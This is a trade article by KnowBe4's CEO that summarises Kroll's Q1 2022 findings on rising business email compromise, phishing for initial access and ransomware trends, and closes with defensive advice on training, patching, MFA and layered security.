Cyberthreats 2022: What we know so far
As ransomware attacks wane, phishing continues to be the weapon of choice for system access.
The key to any robust cyber defense strategy involves two things: insight into your own vulnerabilities and insight into evolving adversarial tactics — only then can you truly build defenses that align with evolving enemy strategies. A report by Kroll, a U.S. provider of technology and insights related to risk and governance, claims the threat environment remains complex, and attackers are increasingly targeting email for initial access and extortion.
Following is a high-level summary of their findings.
Business email compromise attacks rising, ransomware slowing down
In an interesting turn of events, while so-called business email compromise (BEC), a highly-targeted, corporate phishing attack, and ransomware continue to be the top two threat incident types, the latter slipped 30% down from the previous quarter while BEC attacks showed an increase of nearly 19% in comparison to Q4 2021. The report also stated that BEC is playing an increasingly important role in the intrusion lifecycle of cyber extortion attacks.
In one such example, attackers sent a phishing email to IT departments of businesses. Unsuspecting victims clicked on the malicious link and entered their credentials. Once admin credentials were harvested, attackers used them to access the system and took over email accounts belonging to senior IT staff and C-level executives.
They continued to persist on the network, downloading email attachments and data from OneDrive and SharePoint accounts. Attackers then used different methods to contact compromised account holders via text messages and email, sending them ransom notes and demanding payment to end the attack. In some cases, they hijacked social media accounts to further pressure users into meeting their extortionist demands.
Phishing is actively used for initial access
In Q1 2022, phishing as a means to gain initial access to target environments soared by 54% compared to other top tactics such as zero-day exploits and third-party vulnerabilities. Kroll researchers believe that the rise in phishing for initial access may be driven by campaigns originating from Emotet and IcedID developers, who are constantly looking for ways to infiltrate organizations without being detected. The research highlighted a case where an email chain between a third party and an employee led the victim to download a malicious .zip file containing an excel document with macros, which then launched a Microsoft configuration management program called PowerShell. Fortunately, the Emotet attack was blocked by an endpoint detection and response solution. However, the email was still shared internally, which led to multiple infections.
Ransomware actors are leveraging vulnerabilities
While ransomware activity appeared to slow down in Q1 2022, ransomware incidents still account for 32% of all observed cases. The frequency of Conti ransomware attacks dropped by nearly 43% compared to the previous quarter. However, other strains such as LockBit 2.0, AvosLocker, QuantumLocker and Ragnar Locker showed increased activity. Kroll also reported that ransomware gangs continue to exploit vulnerabilities such as ProxyShell and Log4J to gain initial access to target networks. The manufacturing industry was reportedly hit the hardest — with 68% of incidents being ransomware and an overall 33% increase in cyber incidents over the previous quarter.
What organizations can do to protect themselves
Phishing, along with its variants like spear phishing and BEC scams, continues to reign as the primary root cause for all cyberattacks. Unpatched software is another top root cause. If organizations focus on these two aspects and design defenses around them, they will be in much better shape to defend against the bulk of cyberattacks. Here are some security best practices that can help:
- Develop a security culture for employees: Train employees regularly via real-world examples, phishing simulations, classroom training and tabletop exercises. Repeated security awareness training will help them build muscle memory so that they can identify suspicious activity and report it to security teams.
- Perform software patching regularly: Have a process in place that ensures all system software is up-to-date at all times.
- Deploy multi-factor authentication: MFA is known to block almost all account compromise attacks. In case your credentials are hacked, leaked or purchased from the dark web, MFA can play a critical role in preventing further intrusions.
- Use a defense-in-depth approach: Defense-in-depth is a kind of layered security approach that includes a combination of three main things: user awareness (coaching users about password hygiene and phishing tactics); policies and procedures (documenting do’s and don’ts, best practices and incident response procedures); and technical controls (timely patching of software, managing privilege access, performing account hygiene, endpoint detection and response software, firewalls, intrusion detection systems, and other technologies).
As we look for the best ways to position our cybersecurity strategy, it’s important to remember that while tactics can evolve, root causes will always remain the same. If security teams learn to focus on addressing the root causes and not get distracted by the symptoms — ransomware is a symptom, how ransomware got in is a root cause — attackers will have no choice but to move on to the next target.
Stu Sjouwerman is founder and CEO of KnowBe4, [NASDAQ: KNBE] developer of security awareness training and simulated phishing platforms. He was co-founder of Sunbelt Software, the anti-malware software company acquired in 2010. He is the author of four books, including “Cyberheist: The Biggest Financial Threat Facing American Businesses.” Contact him at ssjouwerman@knowbe4.com.
Related: